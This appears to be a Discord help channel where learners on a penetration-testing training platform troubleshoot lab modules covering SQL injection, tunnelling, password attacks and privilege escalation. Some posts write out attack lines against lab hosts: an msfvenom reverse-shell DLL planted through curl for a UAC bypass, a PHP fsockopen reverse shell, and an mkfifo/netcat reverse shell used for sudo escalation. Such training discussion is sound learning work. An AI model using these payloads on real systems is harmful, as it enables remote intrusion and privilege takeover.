#modules

1 messages ยท Page 459 of 1

nocturne geyser
#

Hello, I'm contacting you because I'm stuck on the SQL statement question in the fundamental SQL injection module, where I'm asked to find the department table, except that it isn't in any database (there are four databases, this one: MariaDB [(none)]> show databases;
+--------------------+
| Database |
+-------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.000 sec)
Thank you for your help. Have a nice day/evening.

glad narwhal
#

if I am attacking a target through a ligolo-ng tunnel, and I am using metasploit, what do I set as my LHOST?

fathom pendant
glad narwhal
#

Ok I added this to my Ligolo session:
listener_add --addr 0.0.0.0:1234 (my pivot) --to 0.0.0.0:4444 (my parrot)

Then do I set my LPORT to 1234 or 4444?

fathom pendant
glad narwhal
#

my target is on 172.0.0.1. My pivot is on 172.0.0.2. My Parrot is on 10.10.14.1.

I need the payload that metasploit delivers to go to 172.0.0.2:1234 --> reverse shell to 10.10.14.1:4444

fathom pendant
#

as a note for payloads like this it's kinda awkward; i generally dislike using metasploit through ligolo

#

if you can, use a manual payload instead of an automated one

jade shore
#

anyone doing the Detecting Windows Attacks with Splunk modules i cant open the Splunk siem, im using EU server

nocturne geyser
fathom pendant
#

i believe the module teaches you basic enumeration commands @nocturne geyser

#

the basics of any database tool
databases hold tables; tables hold data

tidal quartz
drowsy grove
#

Hey there. I'm not entirely clear as to what to do here

#

can someone help me out?

glad narwhal
fathom pendant
drowsy grove
#

ye, figured it out, was just a bit confused, I thought I had to do it from a windows attack host I had to connect to from my machine

waxen totem
drowsy grove
#

Oh, already done, I have one set up for reverse engineering and stuff, just used that

latent mesa
#

Sorry I was not aware of that. My bad

fathom pendant
fallow gazelle
#

Hey guys, i need help with the bash scripting intro module. i don't know what's wrong with my skript and keep getting a bad decrypt error

#

It's the task where you have to encode var 28 times via a for loop and then run the decrypt function to get the flag

#

I added the for loop, and also used the number of characters in var as the salt variable

fathom pendant
#

@fallow gazelle that module is above tier 0 so sharing info is against the rules :) (see channel desc.)

fallow gazelle
#

My bad

fathom pendant
#

dm me your for-loop and variable assignment; i feel like I know where your issue may be (i don't need the whole code)

fallow gazelle
olive comet
#

Hello I am currently new to ligolo and I am facing issues connecting to the target machine I guess because the certificate. I tried to see if ippsec uses ligolo but couldn't find any ๐Ÿ™

this is the command issued from the attacker machine :
$ ligolo-proxy -selfcert

weary crow
#

Hello everyone greetings please I'm not getting the protocol for the 5500 in the nmap -sC -sV -p5500 -Pn

#

On the coldfusion Discovery & eunumtion

#

Section of the attacking common applications

#

Module

boreal kelp
#

็”ฑๆ–ผ็ผบไน้•ทๆ™‚็š„่‡ช็„ถ็’ฐๅขƒ่ชฟๆŸฅๆ•ธๆ“š๏ผŒ้‡Ž็”ŸไบŒ่ถพๆจนๆ‡ถ็š„ๅนณๅ‡ๅฃฝๅ‘ฝ็›ฎๅ‰ไป็„ถๆœช็Ÿฅ

boreal kelp
weary crow
devout lily
#

Shells and Payloads module - Live Engagement section

Hi everyone, where can i find a browser in the foothold host?

amber rose
#

Intro to AD rdp connection just fails

weary crow
dense lava
amber rose
#

will do thnx

jade shore
#

hey guys
i cant open the Splunk siem while doing the Detecting Windows Attacks with Splunk modules, im using EU server

dense lava
#

well thats one way to eliminate xfreerdp

amber rose
#

yea i cant even ping the target

#

oh now i could ping it

dense lava
#

does nxc rdp work?

#

are you running the vpn twice?

amber rose
#

no i just used ovpn --config on the downloaded vpn file

dense lava
#

thats usually the cause of intermittent network issues

#

i would probs restart environment and failing that restart vm

amber rose
#

this is the 6 target machine ive spun up FeelsBadMan

dense lava
#

damn

amber rose
#

i guess its the vpn issue the ping takes too much time to respond 240ms

dense lava
#

maybe, depends where you are. i deal with more than that from australia and it generaly works pretty fine

amber rose
#

i see ,k let me try different vpn

amber rose
#

mb

ornate smelt
#

hi guys i am stuck at Intro to Whitebox Pentesting SA2 altough i patched the script but still getting code injection should not be possible, even without sanitization or validation even i removed the Function call to console.log.

EDIT : beside what i mentioned i moved the validation and sanitization inside of try block instead of the function and i got the flag

jade shore
obsidian meteor
#

On the Network Foundations on the last part Skill Assesments there is a step i have to do nc -v <target ip> <dynamic port> in the example on htb it says
(UNKNOWN) [10.129.233] 49704 (?) open
but when i use it i get (UNKNOWN) [10.129.233] 4970 (?) : Connection refused

gray yacht
devout lily
#

Can someone explain me how to select between web shell, bind shell or reverse shell and how to select the right one from the infinite list?

#

i dont think the brute force method is the best

gray yacht
jade shore
tidal vortex
gray yacht
tidal vortex
gray yacht
tidal vortex
gray yacht
wide jungle
#

https://academy.hackthebox.com/module/147/section/1335

For exploiting ESC8, using ntlmrelayx gave me this error, I have tried using new venv to downgrade the crypto version but other errors kept popping up. I'm curios on why certipy's relay function won't work on this one. Anybody has the solution for this?

olive depot
#

I got problem spawn a server in a module, its like just refreshing, what can i do? :3

tribal wasp
#

Hi,
I'm currently working on the LLM Output Attacks module as part of the AI Red Teamer track and reaching the assessment stage.

Could you please point me to the right place (channel, thread, or person) where I can ask for help or discuss the challenge during the assessment phase?

terse bloom
#

Hello, targets not spawning on EU academy

timber goblet
terse bloom
rare condor
#

hey folks

timber goblet
rare condor
#

what is mean of that question ?

#

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128

timber goblet
rare condor
#

I know how can I crack

terse bloom
rare condor
#

but where is hash ๐Ÿ˜„

#

which hash *

timber goblet
timber goblet
terse bloom
rare condor
timber goblet
rare condor
#

Introduction to John The Ripper

timber goblet
rare condor
#

yes

timber goblet
rare condor
#

thats not RIPEMD-128

#

thats md2

#

ahh confusing

timber goblet
terse bloom
gray yacht
terse bloom
terse bloom
#

thanks

rare condor
#

yeyy I got the point

slate zinc
#

@candid bridge i would like to clear up some confusion about the last section of the 2nd module of cwes
https://academy.hackthebox.com/module/75/section/819
here when they say Program a simple web application
they mean you should make the website and test it yourself locally
you dont need to host it and push it to production or even share it with other people
thats why they ask you to do it in a VM in a safe environment

also about attacking the site you have to do it because in this context you are learning the hacks you have to attack it. you can only do so if its hosted locally cause you can just attack a hosted website it would go against the tos/policy of the website hoster(unless its bbh and under boundaries)
but yeah for now keep things local

drowsy grove
#

What flag...

#

also, been at this for a while...just doesn't seem to work

gray yacht
drowsy grove
#

Got it, just did it with ligolo anyway, doesn't matter

#

also, still can't figure out what the flag is

#

nvm

#

I'm blind

gray yacht
#

Yeah some things are hidden in plain sight

drowsy grove
#

just tried it with proxychains4, it worked, thank you!

late parrot
#

This part of the module made me rethink everything I've done so far. I like HTB.

fathom pendant
digital pendant
#

Anyone around for a poke on the priv esc on AEN MS01 host please. I have working routes, not sure if there are more?

weary crow
#

Hello everyone ๐Ÿ‘‹๐Ÿผ please can I get some assistance on the attacking common applications

#

On the Attacking Applications Connecting to Services

#

The gdb debug isn't working

#

It's saying cannot insert breakpoint 1 and cannot access memory at address 0x....

#

Please ๐Ÿ™๐Ÿผ can someone help me out here ๐Ÿ™๐Ÿผ๐Ÿ™๐Ÿผ

fathom pendant
fathom pendant
fathom pendant
digital pendant
#

Not sure I'll do that, its good advice but not my style. I've completed it blind already

weary crow
fathom pendant
digital pendant
#

Yeah. Thats the reason I'm asking, walkthrough doesn't mean thats the only route right? Why I asked anyway...

fathom pendant
#

So translating +10 in decimal -> hex is A or hex -> dex is 16

tidal vortex
#

Yoo, im doing assessment 2 of brute forcing but my command is making an error, and I dont understand why

fathom pendant
weary crow
#

I.e in the memory address should be in decimal

fathom pendant
tidal vortex
fathom pendant
fathom pendant
fathom pendant
weary crow
fathom pendant
tidal vortex
weary crow
quiet halo
#

im doing pass the hash in Password attacks, task 6 where I have to get a reverse shell

#

I get a call back but the shell does not fully connect

#

i've reset the machine 4 times and I get the same result

#
nc.exe : listening on [any] 8001 ...
    + CategoryInfo          : NotSpecified: (listening on [any] 8001 ...:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
dir
connect to [172.16.1.5] from (UNKNOWN) [172.16.1.10] 49759
dir
dir
#

I changed port number, shell type

#

the machine just hangs

fathom pendant
#

Looks like your payload may be incorrect if youre getting that error. Should be able to follow the module instructions and use the payload specified by the module

quiet halo
#

it's the same one as the module

#

wow nvm it's working now

#

I changed the port to 443

silent flume
#

is there a way to turn off windows defender without admin rights

cloud urchin
left estuary
#

hello guys im new here. I'v been working on Fawn module I was at Task 7 , The answer must be ftp -h but it says incorrect task flag what do i do ? ty

left tapir
zenith token
#

Hello There. Can anyone tell me where to download the pcap in the module "Guided Lab: Traffic Analysis Workflow"?

left tapir
left estuary
#

sorry sir ty for that

nimble valley
#

Hello all. I'm working on the brute force - web services module with medusa. In this lesson we are asked to find a password (that I have) then login in the ssh server of the distant machine and check around one or 2 things. The problem : whatever i do i get a permission denied (publickey) on every thing I tried. What I m doing wrong here ?

fathom pendant
#

@weary crow module is above tier 0, avoid spoiling

fathom pendant
#

By default it attempts to connect to port 22, which is locked down on public containers

nimble valley
#

I just found -p 5 seconds ago

#

๐Ÿ˜ข

#

the always true "I'm stupid or what ??" ...

#

I used -P ...

fathom pendant
#

-p and -P are different switches

nimble valley
#

yeah I have no idea why I typed that

weary crow
#

Oh I'm so sorry that I didn't know

rotund sorrel
#

I just did this lab as well, couldnt get the UAC bypass to work for the elevated shell, tried to reset the box, tried signout/signin on the RDP, doesn't seem to work the way its supposed to. Has anyone got this to work recently? if so, DM me
For reference: https://academy.hackthebox.com/module/67/section/626

kali: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.132 LPORT=8443 -f dll > srrstr.dll
kali: nc -lvnp 8443
kali: python3 -m http.server 8081
PS: curl http://10.10.14.132:8081/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
cmd: tasklist /svc | findstr "SystemPropertiesAdvanced"
# output is Empty
cmd C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

# No activity on the nc listener, also tried exploit/multi/handler with the above settings
quasi wave
#

completed another section of CDSA gonna do another today

urban raptor
#

Looking for help on Attacking AI - Application and System - Model Deployment Tampering

Can't figure out walkthrough for challenge "Exploit the ShellTorch vulnerability to obtain the flag. " copying and pasting does not pop the payload.

jovial walrus
#

On the getting started module - privilege escalation section is it not possible to load linPEAS on remote host via python http server? Is there a firewall in place ?

neon tinsel
#

What could be the problem, I'm going through this module(https://academy.hackthebox.com/module/147/section/1327 ) about Password Attack, I got to Network Services, but for some reason the utility from the module just refuses to work, I have already tried both pwnbox and connecting from my PC via the vpn config, nothing changes.The command just doesn't give anything away. I thought the host might be unavailable, but the ping reaches it.

autumn pilot
#

The files from the archive are username.list and password.list, and you are using user.list and pass.list, are they correct?

neon tinsel
autumn pilot
#

Seems to be working

#

Make sure you are not connected twice to the VPN, e.g., having a VM connected to the VPN and at the same time having the workstation on

neon tinsel
autumn pilot
#

It is, what I mean is not be connected to the VPN in your local VM at the same time

mighty harness
#

Anyone can help me for File Upload Skill Assessments how do i intercept the post request made by the ajax scripts? i cant get it around

autumn pilot
#

Try another route, perhaps the ajax scripts one is not the one you need to focus on

neon tinsel
long tulip
hearty wasp
#

Hello

#

Pentest in a Nutshell module

autumn pilot
#

For the Q1 in Credential Hunting in Network Shares use a PowerShell cmdlet to recursively grep for the domain name without the TLD

hearty wasp
#

since it's tier 0, can I share my screen in one of the voice channels?

#

I've been stuck on this for 2 days, it's getting frustrating

autumn pilot
#

On which question are you stuck?

hearty wasp
#

all of the Linux Target sections questions, the target instance is showing and I can scan it using nmap, but I can't find the wordpress website to scan it

autumn pilot
#

The first question directs you to an FTP service, did you try to access it?

hearty wasp
#

yes

autumn pilot
#

Okay, then you should have found something

hearty wasp
#

What is the name of the theme used by WordPress on this target?

#

[i] The main theme could not be detected.

#

wpscan returned that

#

and when trying to figure out the theme manually

autumn pilot
#

What about manually finding the theme?

hearty wasp
#

or using wappalize

#

wappalizer*

autumn pilot
#

In which directory usually the themes are stored?

hearty wasp
autumn pilot
#

If it is not HTTP what about HTTPS

hearty wasp
#

@hybrid stone thank you!

atomic thorn
#

Hello to all . Has anyone completed the android fundamentals module ? I have a problem in final question2 . i use the command: adb shell ls -l /data/data/com.android.settings and i get the following

#

i try as an answer 1000 but it is wrong . Can anyone help ? thanx in advance

lusty flint
#

Module: Active Directory Enumeration & Attacks

Section: Kerberoasting - from Linux

The login cred for the user forend is all the way back in the Section: Credentialed Enumeration - from Linux

Why arenโ€™t the user:creds not mentioned right before the lab within Kerberoasting

Or is there another intended way of finding the user:pass ?

long tulip
sweet comet
#

Were you able to figure this out? I'm trying to solve the question using only WiNRM (except RDP to SRV01) but cant get around the double hop problem either

autumn pilot
devout lily
#

Hi everyone, the foothold host in the Shells and Payloads lab is an internal compromised host or the cat5 pc that as access to the foothold host?

long tulip
#

The first

gray yacht
long tulip
#

I search the smb share with keyword passw, but no one pass works in first wuestion lol

devout lily
# long tulip The first

how is it possible without a shared shell? And how is it possible there are all the tools i need already installed?

long tulip
devout lily
gray yacht
gray yacht
devout lily
gray yacht
# devout lily when u compromise an host, you estabilish a shell session, but here i see a foot...

A shell session isn't what you get every time you compromise a host, but this isn't the time for that. This scenario is unique in that you are provided access to a host within the network, call it an Assumed Breach if you will and yes the host does have all the tools you need to perform your tasks. If you had already done the pivoting module, it is possible, this would not be the scenario. Regardless, what issue are you having with your foothold?

long tulip
#

Anyone can help here?

gray yacht
unique star
#

Hi, I've discovered Administrator credentials in a Windows lab environment that appear to be improperly stored/exposed. Where should I report this security issue?

faint hill
#

OK. I am trying to understand.
I took a few months break off from doing the CPTS and now pretty much everything to do with bloodhound does not match the course. As I'm using the latest Kali edition it seems the CE edition is being pushed over whatever was being used before. However it seems that many attributes are not being collected by the collector and/or not being enumerated by the graphing part of bloodhound.

Case in point to illustrate is the "Checking the Domain Users Group's Local Admin & Execution Rights using BloodHound"

The module shows this under "exectuion rights". Whereas a screenshot of the CE edition as run by me shows 0 items. So what to do? I'm not a big fan of randomly gitcloning stuff so what setup should I be using or should I be looking to downgrade my Kali install to one that's about 1 - 2 years old? Is there a sticky topic that I am missing? Is there maybe a transposition table for equivalent labels/commands between the versions?

Note: running the saved query in the CE edition "Workstations where Domain Users can RDP" yields 0 results.... So something is going wrong somewhere. For the collection I used the SharpHound executable in the c:\tools dir on the victim machine. On second thoughts I uploaded the latest ingestor (found here: https://github.com/SpecterOps/SharpHound/releases/tag/v2.8.0) ran this reloaded and tried again but the result is the same. So what gives?

light palm
#

Hi, I am in desperate need of a hint.
in what seems to be a simple SSRF exercise I am completely stuck.
Module Server-Side attacks section Exploiting SSRF, there's supposed to be hidden directory, I tried fuzzing with like 5 wordlists and found absoloutely nothing, I also tried fuzzing for open ports but only found 3306 mysql port open, which I tried using gopherus on but it was useless.
please someone guide me, in the whole CWES path I have never been stuck on something so seemingly trivial

vale geyser
#

Is there anyone for the Web Attacks Module. Specifically the Section Advanced File Disclosure. I am confused why i can't read source-code like /var/www/html/submitDetails.php or /etc/passwd.

Files i was able to read were /etc/hosts and /flag.php

Noticed this also only happens with the CDATA or Errorbased Approach. With php filter i can /var/www/html/submitDetails.php

pale island
#

for the knowledge check for getting started i cannot seem to get a shell in any type of way. i am using a PHP reverse shell(execshell). do i have to add <php? in front of the php file for it to work? here is my shell:
||php -r '$sock=fsockopen("ip",9004);exec("sh <&3 >&3 2>&3");'|| i dont get anything on my nc listener. also is the website supposed to be this slow i have to wait around 15 seconds every time i click something?

hazy lance
#

hello

#

im on the attacking comon services module, in the FTP section

#

i'm running the lab but i can't establish a connection to the services (i tried the port ||2121|| which was previously responding to nc but isn't now).

#

idk if there are any problem with the labs or is only in my case

#

thanks in advance

gray yacht
#

Please refrain from posting content above Tier 0. I recommend using the search function as this has been asked quite a bit.

gray yacht
#

Nope, that wasn't your post.

white pasture
gray yacht
vocal schooner
#

Hey, i have an issues for the module : RDP and SOCKS Tunneling with SocksOverRDP

https://academy.hackthebox.com/beta/module/158/section/1439

I have to download the SocksOverRDP x64 Binaries, then upload to my target windows and unzip it.

But when i unzip it, the .dll is automatically deleted. I don't know why.
Someone could help me ? thx

frosty sleet
#

Iโ€™m on the password attacks spraying,stuffing, and defaults and i have found the creds on the database but struggling on the submission format, can you help?

white pasture
#

I am currently trying to use || ntlmrelayx || to listen for inbound connections and relay them to the web enrollment service. I am attempting to use the printerbug.py to force the dc01 to authenticate against my machine to be relayed to the certificate authority.
|| I try this :sudo impacket-ntlmrelayx -t http://10.129.111.51/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication ||
but its always time out
was I wrong?

gray yacht
desert widget
#

anyone who managed to solve the sql injection fundamentals skill assessment?

#

I am not able to bypass the login page

devout lily
#

Hi everyone, does HTB Academy assume that we already know many programming languages and shell environments? Because I often see lines of code mentioned as if the syntax is taken for granted.

pliant fossil
#

----SOLVED----

Hey!

Im currently working on the Knowledge check of the Pen tester job role path, getting started module (The website with the outdated GetSimple).

I am done with submitting the user.txt, my next task would be obtaining the root.txt flag.

I have ran into a little issue with privilige escalation.
||
I have ran LinEnum.sh, and I have received an output about a possible sudo pwnage


[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

[+] Possible sudo pwnage!
/usr/bin/php

So, as I have learnt it in an earlier task, I have tried running the following command to obtain root access

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.21 8443 >/tmp/f' | tee -a php

My problem comes here. Upon running this, I get the following output:


<h -i 2>&1|nc 10.10.16.21 8443 >/tmp/f' | tee -a php
tee: php: Permission denied
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.21 8443 >/tmp/f

I don't have access to use tee on php. What am I missing? I'm trying but I really can't find a way to get through this.||

----SOLVED----

quasi wave
#

I completed yet another section of CDSA today.

storm elk
quasi wave
#

in ten minutes will do one more section I think this is going well

fathom pendant
#

@pliant fossil while the module is tier 0; try not to reveal direct steps for solving the skill assessment (knowledge check) of the module, this includes things you had to discover and exploit yourself

pliant fossil
fathom pendant
# pliant fossil Sorry, and thank you for the reminder.

in the future, spoiler tags don't really do anything, but iirc they don't show up in the search feature. But if you have enough info not spoiled...well people can easily find it. Again it's tier 0 so you didn't do anything wrong, and congrats for getting through it!

weary crow
#

Hello please can someone help me

#

I'm at the skills assessment

#

Of attacking common applications

#

(i) I get the connection but it's not displaying back

fathom pendant
weary crow
#

Yeah

#

I'm at the first one

#

I have a connection but it is not working

#

Please can I get some help on it

fathom pendant
#

so you're at the last question?

weary crow
#

Yeah I am

fathom pendant
#

i'm assuming you're using msfconsole and set the target URI properly alongside the RHOST, LHOST, and LPORT options

weary crow
#

I'm really lost here

#

I'm using the py script

fathom pendant
#

either that or return to the reading regarding THE APPLICATION and VERSION in use

weary crow
#

Okay

weary crow
#

It's just not responding

#

I proxied it and it wasn't responding

shut owl
#

Could I get a sanity check on the NoSQLi Injection skills assessment 2 for the Senior Web Penetration Tester path?

pale island
#

Anyone able to give me hint on the knowledge check from the getting started module, stuck at the reverse shell part

fathom pendant
# weary crow The Server is not outputting anything

i used msfconsole on this one but i'm sure you could find other ways to exploit the vulnerability on this server. But as far as 'using the py script' i'm kinda lost there because there's a couple sections that may be relevant to look at not just one

weary crow
#

I get it now

kind lance
#

"Hey everyone, I'm stuck on the 'Information Gathering - Web Edition' module, in the 'Creepy Crawlies' section.

I'm running the required command python3 ReconSpider.py http://inlanefreight.com, but I keep getting a No route to host error.

I don't know what to do. I've already tried switching VPN servers and I even tried using the Pwnbox, but I get the exact same error. What could be causing this and how can I fix it?"

fathom pendant
tame canyon
#

Module: Attack Common Application
section: Exploiting Web Vulnerabilities in Thick-Client Applications

I'm stuck here for the 2nd day ๐Ÿ˜ช

fathom pendant
tame canyon
kind lance
# fathom pendant no route to host sounds like an issue on your end; also try www.inlanefreight.co...

Hi team, I'm having trouble with the "Creepy Crawlies" section of the "Information Gathering - Web Edition" module.

The target machine, inlanefreight.com (10.129.27.33), appears to be offline.

When I run the ReconSpider.py script, it fails with a No route to host error. I've also tried to ping the machine, and it fails with Destination Host Unreachable and 100% packet loss.

To make sure it wasn't my connection, I have already tried:

  • Using the Pwnbox (it also fails to ping the target).
  • Connecting from my Kali machine.
  • Changing my VPN server/region (tried both EU and US).

Since it's unreachable from both the Pwnbox and the VPN, it seems the target machine is down. Could someone please check on it or give it a reset?

Thank you!

fathom pendant
#

if you have 'no route to host' did you mess with the /etc/hosts file?

kind lance
#

"No, I haven't touched my /etc/hosts file. My ping resolves the correct IP (10.129.27.33), but it fails with Destination Host Unreachable.

The key proof is: I tested on the Pwnbox, and the Pwnbox gets the exact same 100% packet loss. The target seems to be unreachable from everywhere."

potent linden
#

Hey, old message but I'm currently stuck on this. If you still remember, how did you get around this?

fathom pendant
#

try

#

python3 ReconSpider.py https://inlanefreight.com
@kind lance

jovial walrus
#

getting started module - priv escalation page
got a connection timeout error when i was trying to load linpeas.sh

#

as per my understanding there could be a firewall in place which doesnt allow to download files from host machine

#

i did a base64 encode and decode but looks like no permissions to run it

fathom pendant
jovial walrus
fathom pendant
fathom pendant
#

it's been a min

fossil jacinth
#

chmod +x ./linpeas.sh ? @jovial walrus

jovial walrus
remote smelt
#

Linux Fundamentals Module, Filter Contents section
Could someone give me a hint as to what commands i need to be looking into

#

i tried using something like || grep -E "(http://|https://)" | sort -u | uniq | wc -l || which didn't seem to work

Edit: Ok i think i got smth better but it's not quite there yet, not sure how to separate the directories from files

kind lance
#

Hey @fathom pendant, I just wanted to say thank you! Your tip that "inlanefreight.com isn't a 10.129.x.x target" was the clue that solved the entire mystery.

It turns out my /etc/hosts file had an old line from a different HTB lab, forcing inlanefreight.com to the dead IP 10.129.27.33. That's why I (and even the Pwnbox, when I tested it) was getting a No route to host error.

After your message, I disconnected the VPN, commented out that wrong line, got the real public IP (134.209.24.248), and then added the correct IP to my /etc/hosts for both inlanefreight.com and www.inlanefreight.com (to fix the 301 redirect).

The script ran perfectly after that. I never would have figured it out without your tip. Thanks again!

hollow kernel
hasty mauve
foggy geode
#

Hey yall I have some questions, so Iโ€™m using hack the box and the first lesson is about testing the network and it is having me access the ip for the vpn so my questions is 1. How do I know/figure out what vpn the target is using and is there any commands for it and 2. Does the vpn have specific ips that they have for the entire vpn or are they each different like im thinking and 3. If they are different how do I find that ip

jovial walrus
#

how to approach this nimbles box? shall I try to get the flag myself and read through the contents on each page?

fossil jacinth
#

When you click "Spawn target" it'll show you the IP of that box.
You either need to be connected through openvpn on your own VM instance, or you can use the pwnbox.
That way, both the target and "your" VM will be on the same subnet and able to talk to each other. @jovial walrus

jovial walrus
fossil jacinth
#

The modules teach you - and the target is where you practice / apply those techniques.

potent linden
plain charm
#

Hi, Did the module SQL Injection Fundamentals got any updates? the final skill assessment is totally different than before

#

I completed it, but some questions are unanswered and after spawing the lab. its total another web app

spring trail
#

Module: Documenting & Reporting

Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)

What i tried;

  • [Ctrl] + [b] + [%]
  • [Ctrl] + [b] + [Shift] + [5]
  • Ctrl + b + Shift + 5

it doesn't work, anyone know why?

#

Thanks, i get the question ๐Ÿ™‚

feral adder
#

Does anyone know this error? from web fuzzing module of Virtual Host and Subdomain Fuzzing

Command I used: gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Error: Incorrect Usage: invalid value "inlanefreight.com" for flag -d: parse error

summer swallow
#

Anyone getting 500 error on accessing Academy 2.0 beta ?

mental canopy
rare condor
#

hey folks

#

I changed my browser to firefox now vnc(pwnbox) is not accept clipboard from my host

#

did anyone got this problem ?

mighty harness
#

i have also same problem when using academy 2.0 so i switch back to the original

rare condor
#

I am also on 1.0 version

autumn pilot
#

Check the permissions in your browser, sometimes rejecting a certain permission could affect the clipboard

rare condor
#

No one use firefox ?

odd surge
#

@grand sphinx

unborn hatch
#

sillly question - but for the AI Red team job path - in the Applications of AI In Infosec - do you need to download and install conda and jupyter notebooks every time you spawn a pwnbox? I'm on the Spam classification section and it appears neither are installed by default

autumn pilot
#

Once your workstation is terminated it looses the installed/downloaded tools/files

urban forum
#

hello, i want to ask any body have problem in submitting flag in phishing section in xss module ?

sacred rock
# urban forum

I see your flag submissions, you are most likely copying spaces

pine eagle
#

Could anyone help me for a module Im stuck at ๐Ÿ˜ญ

#

In Linux Fundimentals - Task Scheduling
It's asking me to find a type for the task dconf.service
Well I used systemctl, as mentioned in the descriptions above, and can't find any types.

What did I do wrong? Im so stuck here for a week or so.

urban forum
weary crow
#

Hello please can someone help me with the exploiting thick clients vulnerability I'm trying to compile the invoke.java but the src code giving me 62 error in src code bother the edit src and the normal one

winter jasper
#

HTB Assistance Needed: Path = AI Red Teamer; Module = Applications of AI in InfoSec; Section = The Malware Dataset.
Issue = After installing conda and the python ai environment, and Jupyter, there is not enough space available in the VM to unzip the malimg.zip file (it is entirely likely I did something wrong).
Issue Summary:
Working on HTB Malimg module in Pwnbox. Need to download and process malimg_paper_dataset_imgs, but every attempt fails with โ€œNo space left on device.โ€

Tried:
Installed Miniconda, created ai env, Jupyter works.
Downloaded from ETH Zurich (404), GitHub, and Kaggle (1.1 GB ZIP).
Downloads stop at ~3%, unzip fails.
Cleaned caches, removed conda pkgs/envs, still 90%+ disk use (df -h shows ~1โ€“3 GB free).
Confirmed itโ€™s not a network or permission issue.

Current:
Environment OK, but dataset too large for Pwnbox (needs >5 GB free).

Need:
Clarify if storage quota can be increased,
Or if module must be run locally / with smaller dataset.

cosmic vine
#

did the ability to extend target lifetime disappear? i only have the ability to refresh it

sweet comet
#

Could anyone give a nudge for the last question on Windows Lateral Movement Skills assessment.
What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?

I have the VNC password, creds for ||arturo, dahlia and rossy|| as well as the NT hash for ||naomy||. I have a reverse shell on BACKUP and RDP to WSUS.

Really do not see the path from here. I'm guessing VNC but no luck there. RDP to BACKUP somehow?

weary crow
leaden island
#

yo guys

#

ah yes, one message

im on file inclusion module
on log poisoning section
in the LFI vulnerability, im trying to read /var/log/apache2/access.log, which reads fine
im also able to inject text in the file by changing user-agent header
however, when i inject a php webshell, the file dosent output anything (either by including it or by trying to execute commands by &cmd=)
welp

digital pendant
#

You are on the right lines with VNC. Give it another go but think internally... if that helps

sweet comet
digital pendant
#

I presume you have a meter meterpreter session from the earlier flag, if not you might struggle from there

sweet comet
digital pendant
#

Okay that's not end of world just a slightly different route, consider a port forward to the system youre on and then you should be able to VNC over proxy

#

On phone so cant do much more than this, hope you crack it soon!

sweet comet
rare condor
#

is firefox supported by HTB for pwnbox officialy ?

#

make it true on about:config

jaunty coyote
#

im trying to download the third file. the open vpn, how do i do that?

pale island
chilly furnace
#

Currently working on CPTS Password Attacks Skills assessment. I just completed it and was redoing it to make sure I understood everything. Could a moderator please DM, I have encountered an issue and don't want to post any spoilers

jaunty coyote
pale island
chilly furnace
jaunty coyote
#

okay im pretty sure i downloaded the vpn

#

but i still cant ping the htb ctf

chilly furnace
#

now run: sudo openvpn <openvpnfile>

fathom pendant
chilly furnace
#

It's more of a general question

fathom pendant
chilly furnace
#

Today, when I ran the initial mimi command, it showed (null) for user s**m. I can't figure out why. I have tried everything, was able to get their ticket/hash's, login using a PTH attack, but it still shows (null) for their password

#

Just realized adding asterisks to obfusacate the user's names messed up my formatting

fathom pendant
#

that's discord

#

also you did still reveal a lot of info for the assessment (specifically the file format)

chilly furnace
#

Sorry, not trying to spoil or break terms

fathom pendant
#

i mean you could have edited it instead of deleting

chilly furnace
#

But the issue remains the same.

fathom pendant
chilly furnace
#

correct

#

I was able to use that pw to compromise the DC and dump the admin's hash

fierce island
fathom pendant
#

there could be a multitude of reasons as to why that happened, that's not necessarily a bug

#

do a UDP scan

fierce island
#

helppp

fathom pendant
fierce island
tranquil wren
#

try T -4

fathom pendant
fathom pendant
tranquil wren
fathom pendant
#

also that module is above tier 0; so don't spoil things like commands

fierce island
#

ok sry

#

taking so long what to do

#

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-30 01:55 IST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.129.2.48
Host is up.

PORT STATE SERVICE VERSION
53/udp open|filtered domain

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

fathom pendant
#

also sometimes packet-trace can be helpful if you're not getting the expected results

fierce island
#

tried everything not working T_T

#

PORT STATE SERVICE VERSION
53/tcp filtered domain
53/udp open|filtered domain

tranquil wren
#

try resetting the target, its worked for me when things aren't working correctly

fathom pendant
fierce island
#

after restarting it came with a simple cmd ๐Ÿ˜„ T_T

digital pendant
#

I didnt get a rev shell at all, tried a few suggestions from people that DM'd me too.

I went for User Added approach which worked

#

want to DM me your approach?

forest shard
#

Hello, I have a question: I just finished the "Footprinting lab easy". I was able to get the flag and wanted to look at the solution to see how they did it. I don't understand the purpose of the "dig" part. It seems they used it to|| find the second FTP service, but I found it with a simple nmap scan, and even in the solution it shows up in their first nmap scan.|| So why all the DNS enumeration? Is it just for training purposes ? (which is a good point)

brazen light
#

I was hoping to have some assistance with the skills assessment for Pivoting, Tunneling, and Port Forwarding. I have gotten to the last box but the network location is disconnected and unable to be reconnected. Even in the 'show solution' inside the module, it has it enabled. Other walkthroughs I have found has the drive enabled already. Is there something I need to do to enable it?

digital pendant
brazen light
digital pendant
#

We solved this one together \o/ good job

rain wolf
#

